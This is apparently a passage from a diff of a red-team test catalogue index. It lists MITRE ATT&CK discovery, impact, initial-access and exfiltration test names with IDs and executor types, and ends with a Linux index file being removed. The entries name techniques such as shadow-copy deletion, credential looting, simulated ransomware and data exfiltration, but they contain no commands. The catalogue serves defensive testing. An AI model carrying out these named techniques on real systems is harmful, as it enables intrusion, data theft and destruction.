2074 discovery T1201 Password Policy Discovery 9 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
2075 discovery T1201 Password Policy Discovery 10 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
2076 discovery T1201 Password Policy Discovery 11 Use of SecEdit.exe to export the local security policy (including the password policy) 510cc97f-56ac-4cd3-a198-d3218c23d889 command_prompt
2077 discovery T1201 Password Policy Discovery 12 Examine AWS Password Policy 15330820-d405-450b-bd08-16b5be5be9f4 sh
2078 discovery T1614.001 System Location Discovery: System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
2079 discovery T1614.001 System Location Discovery: System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
2080 discovery T1614.001 System Location Discovery: System Language Discovery 3 Discover System Language with locale 837d609b-845e-4519-90ce-edc3b4b0e138 sh
2081 discovery T1614.001 System Location Discovery: System Language Discovery 4 Discover System Language with localectl 07ce871a-b3c3-44a3-97fa-a20118fdc7c9 sh
2082 discovery T1614.001 System Location Discovery: System Language Discovery 5 Discover System Language by locale file 5d7057c9-2c8a-4026-91dd-13b5584daa69 sh
2083 discovery T1614.001 System Location Discovery: System Language Discovery 6 Discover System Language by Environment Variable Query cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a sh
2084 discovery T1614.001 System Location Discovery: System Language Discovery 7 Discover System Language with dism.exe 69f625ba-938f-4900-bdff-82ada3df5d9c command_prompt
2085 discovery T1614.001 System Location Discovery: System Language Discovery 8 Discover System Language by Windows API Query e39b99e9-ce7f-4b24-9c88-0fbad069e6c6 command_prompt
2086 discovery T1614.001 System Location Discovery: System Language Discovery 9 Discover System Language with WMIC 4758003d-db14-4959-9c0f-9e87558ac69e command_prompt
2087 discovery T1614.001 System Location Discovery: System Language Discovery 10 Discover System Language with Powershell 1f23bfe8-36d4-49ce-903a-19a1e8c6631b powershell
2088 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
2089 discovery T1012 Query Registry 2 Query Registry with Powershell cmdlets 0434d081-bb32-42ce-bcbb-3548e4f2628f powershell
2090 discovery T1012 Query Registry 3 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
2091 discovery T1012 Query Registry 4 Reg query for AlwaysInstallElevated status 6fb4c4c5-f949-4fd2-8af5-ddbc61595223 command_prompt
2092 discovery T1012 Query Registry 5 Check Software Inventory Logging (SIL) status via Registry 5c784969-1d43-4ac7-8c3d-ed6d025ed10d command_prompt
2093 discovery T1012 Query Registry 6 Inspect SystemStartOptions Value in Registry 96257079-cdc1-4aba-8705-3146e94b6dce command_prompt
2094 discovery T1614 System Location Discovery 1 Get geolocation info through IP-Lookup services using curl Windows fe53e878-10a3-477b-963e-4367348f5af5 command_prompt
2095 discovery T1614 System Location Discovery 2 Get geolocation info through IP-Lookup services using curl freebsd, linux or macos 552b4db3-8850-412c-abce-ab5cc8a86604 bash
2096 discovery T1518.001 Software Discovery: Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
2097 discovery T1518.001 Software Discovery: Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
2098 discovery T1518.001 Software Discovery: Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
2099 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
2100 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - pgrep (FreeBSD) fa96c21c-5fd6-4428-aa28-51a2fbecdbdc sh
2101 discovery T1518.001 Software Discovery: Security Software Discovery 6 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
2102 discovery T1518.001 Software Discovery: Security Software Discovery 7 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
2103 discovery T1518.001 Software Discovery: Security Software Discovery 8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets 015cd268-996e-4c32-8347-94c80c6286ee command_prompt
2104 discovery T1518.001 Software Discovery: Security Software Discovery 9 Security Software Discovery - Windows Defender Enumeration d3415a0e-66ef-429b-acf4-a768876954f6 powershell
2105 discovery T1518.001 Software Discovery: Security Software Discovery 10 Security Software Discovery - Windows Firewall Enumeration 9dca5a1d-f78c-4a8d-accb-d6de67cfed6b powershell
2106 discovery T1518.001 Software Discovery: Security Software Discovery 11 Get Windows Defender exclusion settings using WMIC e31564c8-4c60-40cd-a8f4-9261307e8336 command_prompt
2107 discovery T1526 Cloud Service Discovery 1 Azure - Dump Subscription Data with MicroBurst 1e40bb1d-195e-401e-a86b-c192f55e005c powershell
2108 discovery T1526 Cloud Service Discovery 2 AWS - Enumerate common cloud services aa8b9bcc-46fa-4a59-9237-73c7b93a980c powershell
2109 discovery T1526 Cloud Service Discovery 3 Azure - Enumerate common cloud services 58f57c8f-db14-4e62-a4d3-5aaf556755d7 powershell
2110 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
2111 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
2112 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
2113 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
2114 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
2115 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
2116 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
2117 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
2118 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
2119 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
2120 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
2121 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
2122 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
2123 discovery T1018 Remote System Discovery 14 Remote System Discovery - netstat d2791d72-b67f-4615-814f-ec824a91f514 sh
2124 discovery T1018 Remote System Discovery 15 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
2125 discovery T1018 Remote System Discovery 16 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
2126 discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
2127 discovery T1018 Remote System Discovery 18 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
2128 discovery T1018 Remote System Discovery 19 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
2129 discovery T1018 Remote System Discovery 20 Get-WmiObject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
2130 discovery T1018 Remote System Discovery 21 Remote System Discovery - net group Domain Controller 5843529a-5056-4bc1-9c13-a311e2af4ca0 command_prompt
2131 discovery T1018 Remote System Discovery 22 Enumerate Remote Hosts with Netscan b8147c9a-84db-4ec1-8eee-4e0da75f0de5 powershell
2132 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
2133 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
2134 discovery T1046 Network Service Discovery 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
2135 discovery T1046 Network Service Discovery 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
2136 discovery T1046 Network Service Discovery 5 WinPwn - spoolvulnscan 54574908-f1de-4356-9021-8053dd57439a powershell
2137 discovery T1046 Network Service Discovery 6 WinPwn - MS17-10 97585b04-5be2-40e9-8c31-82157b8af2d6 powershell
2138 discovery T1046 Network Service Discovery 7 WinPwn - bluekeep 1cca5640-32a9-46e6-b8e0-fabbe2384a73 powershell
2139 discovery T1046 Network Service Discovery 8 WinPwn - fruit bb037826-cbe8-4a41-93ea-b94059d6bb98 powershell
2140 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
2141 discovery T1046 Network Service Discovery 10 Port-Scanning /24 Subnet with PowerShell 05df2a79-dba6-4088-a804-9ca0802ca8e4 powershell
2142 discovery T1046 Network Service Discovery 11 Remote Desktop Services Discovery via PowerShell 9e55750e-4cbf-4013-9627-e9a045b541bf powershell
2143 discovery T1046 Network Service Discovery 12 Port Scan using nmap (Port range) 0d5a2b03-3a26-45e4-96ae-89485b4d1f97 sh
2144 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
2145 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
2146 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
2147 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
2148 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
2149 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
2150 discovery T1622 Debugger Evasion 1 Detect a Debugger Presence in the Machine 58bd8c8d-3a1a-4467-a69c-439c75469b07 powershell
2151 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
2152 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
2153 discovery T1124 System Time Discovery 3 System Time Discovery in FreeBSD/macOS f449c933-0891-407f-821e-7916a21a1a6f sh
2154 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
2155 discovery T1124 System Time Discovery 5 System Time with Windows time Command 53ead5db-7098-4111-bb3f-563be390e72e command_prompt
2156 discovery T1124 System Time Discovery 6 Discover System Time Zone via Registry 25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47 command_prompt
2157 reconnaissance T1592.001 Gather Victim Host Information: Hardware 1 Enumerate PlugNPlay Camera d430bf85-b656-40e7-b238-42db01df0183 powershell
2158 reconnaissance T1595.003 Active Scanning: Wordlist Scanning 1 Web Server Wordlist Scan 89a83c3e-0b39-4c80-99f5-c2aa084098bd powershell
2159 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
2160 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
2161 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
2162 impact T1489 Service Stop 4 Linux - Stop service using systemctl 42e3a5bd-1e45-427f-aa08-2a65fa29a820 sh
2163 impact T1489 Service Stop 5 Linux - Stop service by killing process using killall e5d95be6-02ee-4ff1-aebe-cf86013b6189 sh
2164 impact T1489 Service Stop 6 Linux - Stop service by killing process using kill 332f4c76-7e96-41a6-8cc2-7361c49db8be sh
2165 impact T1489 Service Stop 7 Linux - Stop service by killing process using pkill 08b4718f-a8bf-4bb5-a552-294fc5178fea sh
2166 impact T1489 Service Stop 8 Abuse of linux magic system request key for Send a SIGTERM to all processes 6e76f56f-2373-4a6c-a63f-98b7b72761f1 bash
2167 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
2168 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
2169 impact T1491.001 Defacement: Internal Defacement 3 ESXi - Change Welcome Message on Direct Console User Interface (DCUI) 30905f21-34f3-4504-8b4c-f7a5e314b810 command_prompt
2170 impact T1491.001 Defacement: Internal Defacement 4 Windows - Display a simulated ransom note via Notepad (non-destructive) 0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5 powershell
2171 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
2172 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
2173 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
2174 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
2175 impact T1531 Account Access Removal 5 Delete User via dscl utility 4d938c43-2fe8-4d70-a5b3-5bf239aa7846 sh
2176 impact T1531 Account Access Removal 6 Delete User via sysadminctl utility d3812c4e-30ee-466a-a0aa-07e355b561d6 sh
2177 impact T1531 Account Access Removal 7 Azure AD - Delete user via Azure AD PowerShell 4f577511-dc1c-4045-bcb8-75d2457f01f4 powershell
2178 impact T1531 Account Access Removal 8 Azure AD - Delete user via Azure CLI c955c1c7-3145-4a22-af2d-63eea0d967f0 powershell
2179 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (FreeBSD/Linux) 7b8ce084-3922-4618-8d22-95f996173765 sh
2180 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (FreeBSD/Linux) 53e6735a-4727-44cc-b35b-237682a151ad sh
2181 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (FreeBSD/Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f sh
2182 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (FreeBSD/Linux) 142752dc-ca71-443b-9359-cf6f497315f1 sh
2183 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
2184 impact T1486 Data Encrypted for Impact 6 Encrypt files using 7z utility - macOS 645f0f5a-ef09-48d8-b9bc-f0e24c642d72 sh
2185 impact T1486 Data Encrypted for Impact 7 Encrypt files using openssl utility - macOS 1a01f6b8-b1e8-418e-bbe3-78a6f822759e sh
2186 impact T1486 Data Encrypted for Impact 8 Data Encrypted with GPG4Win 4541e2c2-33c8-44b1-be79-9161440f1718 powershell
2187 impact T1486 Data Encrypted for Impact 9 Data Encrypt Using DiskCryptor 44b68e11-9da2-4d45-a0d9-893dabd60f30 command_prompt
2188 impact T1486 Data Encrypted for Impact 10 Akira Ransomware drop Files with .akira Extension and Ransomnote ab3f793f-2dcc-4da5-9c71-34988307263f powershell
2189 impact T1496 Resource Hijacking 1 FreeBSD/macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 sh
2190 impact T1485 Data Destruction 1 Windows - Overwrite file with SysInternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
2191 impact T1485 Data Destruction 2 FreeBSD/macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 sh
2192 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
2193 impact T1485 Data Destruction 4 GCP - Delete Bucket 4ac71389-40f4-448a-b73f-754346b3f928 sh
2194 impact T1485 Data Destruction 5 ESXi - Delete VM Snapshots 1207ddff-f25b-41b3-aa0e-7c26d2b546d1 command_prompt
2195 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
2196 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
2197 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
2198 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
2199 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
2200 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
2201 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
2202 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
2203 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
2204 impact T1490 Inhibit System Recovery 10 Windows - vssadmin Resize Shadowstorage Volume da558b07-69ae-41b9-b9d4-4d98154a7049 powershell
2205 impact T1490 Inhibit System Recovery 11 Modify VSS Service Permissions a4420f93-5386-4290-b780-f4f66abc7070 command_prompt
2206 impact T1490 Inhibit System Recovery 12 Disable Time Machine ed952f70-91d4-445a-b7ff-30966bfb1aff sh
2207 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
2208 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
2209 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - FreeBSD/macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb sh
2210 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - FreeBSD/macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de sh
2211 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - FreeBSD/macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 sh
2212 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - FreeBSD/Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd sh
2213 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - FreeBSD 7b1cee42-320f-4890-b056-d65c8b884ba5 sh
2214 impact T1529 System Shutdown/Reboot 8 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
2215 impact T1529 System Shutdown/Reboot 9 Shutdown System via `poweroff` - FreeBSD/Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa sh
2216 impact T1529 System Shutdown/Reboot 10 Reboot System via `poweroff` - FreeBSD 5a282e50-86ff-438d-8cef-8ae01c9e62e1 sh
2217 impact T1529 System Shutdown/Reboot 11 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
2218 impact T1529 System Shutdown/Reboot 12 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
2219 impact T1529 System Shutdown/Reboot 13 ESXi - Terminates VMs using pkill 987c9b4d-a637-42db-b1cb-e9e242c3991b command_prompt
2220 impact T1529 System Shutdown/Reboot 14 ESXi - Avoslocker enumerates VMs and forcefully kills VMs 189f7d6e-9442-4160-9bc3-5e4104d93ece command_prompt
2221 impact T1529 System Shutdown/Reboot 15 ESXi - vim-cmd Used to Power Off VMs 622cc1a0-45e7-428c-aed7-c96dd605fbe6 command_prompt
2222 impact T1529 System Shutdown/Reboot 16 Abuse of Linux Magic System Request Key for Reboot d2a1f4bc-a064-4223-8281-a086dce5423c bash
2223 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
2224 initial-access T1566.002 Phishing: Spearphishing Link 1 Paste and run technique bc177ef9-6a12-4ebc-a2ec-d41e19c2791d powershell
2225 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
2226 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
2227 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
2228 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
2229 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
2230 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
2231 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
2232 initial-access T1195.002 Compromise Software Supply Chain 1 Simulate npm package installation on a Linux system a9604672-cd46-493b-b58f-fd4124c22dd3 bash
2233 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
2234 initial-access T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
2235 initial-access T1078.004 Valid Accounts: Cloud Accounts 3 GCP - Create Custom IAM Role 3a159042-69e6-4398-9a69-3308a4841c85 sh
2236 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
2237 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
2238 initial-access T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
2239 initial-access T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
2240 initial-access T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
2241 initial-access T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
2242 initial-access T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
2243 initial-access T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
2244 initial-access T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
2245 initial-access T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
2246 initial-access T1078.003 Valid Accounts: Local Accounts 11 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
2247 initial-access T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
2248 initial-access T1078.003 Valid Accounts: Local Accounts 13 Use PsExec to elevate to NT Authority\SYSTEM account 6904235f-0f55-4039-8aed-41c300ff7733 command_prompt
2249 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
2250 exfiltration T1020 Automated Exfiltration 2 Exfiltration via Encrypted FTP 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac powershell
2251 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
2252 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl freebsd,linux or macos 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
2253 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 3 Exfiltrate data in a file over HTTPS using wget 7ccdfcfa-6707-46bc-b812-007ab6ff951c sh
2254 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 4 Exfiltrate data as text over HTTPS using wget 8bec51da-7a6d-4346-b941-51eca448c4b0 sh
2255 exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
2256 exfiltration T1041 Exfiltration Over C2 Channel 2 Text Based Data Exfiltration using DNS subdomains c9207f3e-213d-4cc7-ad2a-7697a7237df9 powershell
2257 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
2258 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
2259 exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
2260 exfiltration T1048 Exfiltration Over Alternative Protocol 4 Exfiltrate Data using DNS Queries via dig a27916da-05f2-4316-a3ee-feec67a437be bash
2261 exfiltration T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites 1 Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) c2e8ab6e-431e-460a-a2aa-3bc6a32022e3 powershell
2262 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 1 Exfiltrate data with rclone to cloud Storage - Mega (Windows) 8529ee44-279a-4a19-80bf-b846a40dda58 powershell
2263 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 2 Exfiltrate data with rclone to cloud Storage - AWS S3 a4b74723-5cee-4300-91c3-5e34166909b4 powershell
2264 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
2265 exfiltration T1030 Data Transfer Size Limits 2 Network-Based Data Transfer in Small Chunks f0287b58-f4bc-40f6-87eb-692e126e7f8f powershell
2266 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
2267 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
2268 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
2269 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
2270 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
2271 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 6 MAZE FTP Upload 57799bc2-ad1e-4130-a793-fb0c385130ba powershell
2272 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 7 Exfiltration Over Alternative Protocol - FTP - Rclone b854eb97-bf9b-45ab-a1b5-b94e4880c56b powershell
2273 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 8 Python3 http.server 3ea1f938-f80a-4305-9aa8-431bc4867313 sh
atomics/Indexes/Indexes-CSV/linux-index.csv
-464
View File
@@ -1,464 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
